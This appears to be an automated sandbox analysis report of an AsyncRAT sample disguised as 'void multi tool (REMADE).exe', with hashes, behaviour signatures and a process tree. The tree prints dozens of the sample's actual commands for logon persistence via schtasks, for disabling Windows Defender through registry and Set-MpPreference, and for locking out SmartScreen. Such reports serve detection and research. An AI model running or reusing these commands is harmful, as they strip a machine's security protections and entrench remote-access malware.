Analysis

  • max time kernel
    1050s
  • max time network
    1048s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    07-12-2024 08:55

General

  • Target

    void multi tool (REMADE).exe

  • Size

    1019KB

  • MD5

    d29a36498fe897fa0004f32f9871651d

  • SHA1

    d63480767689bdd2beeb3dcb90df901947f8b692

  • SHA256

    651c36f0da68009168c0eda7cb0c33eac27d2c57840cabb2604db862d291c671

  • SHA512

    32d6d8c5bcac2befacbea3fa252faf66474688dfce3da03140f6af2d1fa4c4ee81b21f04bdbeb018c8c9a6f4b0026083b68bdacac334989ad8aeba35fd7b0c45

  • SSDEEP

    12288:TKvaingOmpidUUm8QDzejkNBGxqqOTVRX/W0z:TWg3pCm8qqOMxOTVR3z

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 16 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Windows security bypass 2 TTPs 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Possible privilege escalation attempt 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Modifies file permissions 1 TTPs 3 IoCs
  • Windows security modification 2 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Modifies Security services 2 TTPs 4 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 5 IoCs
  • Modifies registry key 1 TTPs 24 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 60 IoCs
  • Suspicious use of SendNotifyMessage 52 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\void multi tool (REMADE).exe
    "C:\Users\Admin\AppData\Local\Temp\void multi tool (REMADE).exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4252
    • C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsDefender.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:724
      • C:\Windows\SYSTEM32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Windows" /tr "C:\Users\Admin\AppData\Roaming\testgovna.exe" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5088
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "Windows" /tr "C:\Users\Admin\AppData\Roaming\testgovna.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:4168
    • C:\Users\Admin\AppData\Local\Temp\WindowsSecruity.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsSecruity.exe"
      2⤵
      • Modifies Windows Defender Real-time Protection settings
      • Windows security bypass
      • Checks computer location settings
      • Executes dropped EXE
      • Windows security modification
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      PID:3440
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1156
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry key
          PID:648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:848
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" delete HKLM\Software\Policies\Microsoft\Windows Defender /f
          4⤵
          • Modifies registry key
          PID:2380
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5644
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:5848
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:876
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender /v DisableAntiVirus /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:3264
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5272
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine /v MpEnablePus / t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry key
          PID:1056
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5372
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:1420
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5748
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableIOAVProtection /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:3040
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3004
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:5812
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5124
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:1316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2108
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:4288
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2424
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\Reporting /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:4596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1368
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:5820
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:932
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SpynetReporting /t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry key
          PID:6120
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:636
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
          4⤵
          • Modifies registry key
          PID:5972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:696
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger /v Start /t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry key
          PID:3948
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:5556
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger /v Start /t REG_DWORD /d 0 /f
          4⤵
          • Modifies registry key
          PID:4176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:5528
        • C:\Windows\system32\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh /Disable
          4⤵
            PID:4284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:5016
          • C:\Windows\system32\schtasks.exe
            "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance /Disable
            4⤵
              PID:5780
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:2624
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Cleanup /Disable
              4⤵
                PID:1584
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2232
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan /Disable
                4⤵
                  PID:2752
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3444
                • C:\Windows\system32\schtasks.exe
                  "C:\Windows\system32\schtasks.exe" /Change /TN Microsoft\Windows\Windows Defender\Windows Defender Verification /Disable
                  4⤵
                    PID:472
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1264
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v SecurityHealth /f
                    4⤵
                    • Modifies registry key
                    PID:456
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2408
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
                    4⤵
                    • Modifies registry key
                    PID:3752
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1436
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" delete HKCR\*\shellex\ContextMenuHandlers\EPP /f
                    4⤵
                    • Modifies registry class
                    PID:5184
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1728
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" delete HKCR\Directory\shellex\ContextMenuHandlers\EPP /f
                    4⤵
                    • Modifies registry class
                    PID:6128
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5660
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" delete HKCR\Drive\shellex\ContextMenuHandlers\EPP /f
                    4⤵
                    • Modifies registry class
                    PID:2200
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4864
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdBoot /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies Security services
                    • Modifies registry key
                    PID:5888
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5416
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdFilter /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies Security services
                    • Modifies registry key
                    PID:5420
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5772
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisDrv /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies Security services
                    • Modifies registry key
                    PID:4656
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5148
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WdNisSvc /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies Security services
                    • Modifies registry key
                    PID:704
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4840
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\System\CurrentControlSet\Services\WinDefend /v Start /t REG_DWORD /d 4 /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:1224
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3128
                  • C:\Windows\system32\reg.exe
                    "C:\Windows\system32\reg.exe" add HKLM\Software\Microsoft\Windows Defender\Features /v TamperProtection /t REG_DWORD /d 0 /f
                    4⤵
                    • Modifies registry key
                    PID:5944
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" takeown /f "%systemroot%\System32\smartscreen.exe" /a
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4596
                  • C:\Windows\system32\takeown.exe
                    "C:\Windows\system32\takeown.exe" /f %systemroot%\System32\smartscreen.exe /a
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:5368
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /reset
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5784
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /reset
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:5808
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" taskkill /im smartscreen.exe /f
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:220
                  • C:\Windows\system32\taskkill.exe
                    "C:\Windows\system32\taskkill.exe" /im smartscreen.exe /f
                    4⤵
                    • Kills process with taskkill
                    PID:5668
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
                  3⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2060
                  • C:\Windows\system32\icacls.exe
                    "C:\Windows\system32\icacls.exe" %systemroot%\System32\smartscreen.exe /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:5392
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension .exe
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1068
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3344
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -PUAProtection disable
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:444
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:6036
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3696
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5684
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5912
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5568
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:4076
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5012
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:4284
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:3420
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                  3⤵
                  • Command and Scripting Interpreter: PowerShell
                  PID:5508
                  • C:\Windows\System32\Conhost.exe
                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    4⤵
                      PID:5812
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:5496
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2508
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:2092
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                    3⤵
                    • Command and Scripting Interpreter: PowerShell
                    PID:3744
                    • C:\Windows\System32\Conhost.exe
                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      4⤵
                        PID:5748
